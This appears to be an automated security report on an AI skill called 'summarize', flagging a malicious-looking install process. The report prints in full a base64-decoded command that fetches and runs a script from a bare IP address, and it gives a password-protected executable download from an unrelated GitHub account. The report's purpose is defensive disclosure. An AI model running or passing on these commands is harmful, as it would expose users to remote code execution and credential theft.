Trust Assessment
summarize received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated Remote Code Execution via Base64 Decoded Script, Untrusted Executable Download and Manual Execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated Remote Code Execution via Base64 Decoded Script The MacOS installation instructions advise the user to copy and execute a shell command that decodes a base64 string and pipes its output directly to `bash`. The decoded string is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an unverified IP address (`91.92.242.30`). This constitutes a severe supply chain risk, as the content of the downloaded script is unknown and could be malicious, leading to data exfiltration, credential harvesting, or system compromise. The use of base64 encoding attempts to hide the true nature of the command. Remove the obfuscated command. If an external dependency is required, provide clear, verifiable installation instructions from trusted sources (e.g., official package managers, signed binaries, or well-known repositories) without resorting to direct execution of arbitrary remote scripts. Ensure any downloaded scripts are thoroughly reviewed and their integrity verified before execution. | LLM | SKILL.md:11 | |
| HIGH | Untrusted Executable Download and Manual Execution The Windows installation instructions direct the user to download an executable (`OpenClawProvider-1.0.2.zip`) from a GitHub release page (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`) and run it. The source `syazema/OpenClawProvider` is not clearly associated with the `summarize` tool's official homepage (`summarize.sh`), raising supply chain concerns. Additionally, the archive requires a password (`openclaw`), which is an unusual and suspicious practice for distributing software, potentially indicating an attempt to bypass security scans or hide malicious content. Running untrusted executables can lead to system compromise. Provide clear, verifiable installation instructions from trusted sources. If `OpenClawProvider` is a legitimate dependency, link to its official, signed releases or package manager distribution. Avoid distributing executables via password-protected archives from unverified GitHub accounts. | LLM | SKILL.md:5 |
Scan History
Embed Code
[](https://skillshield.io/report/196dcdc75da72351)
Powered by SkillShield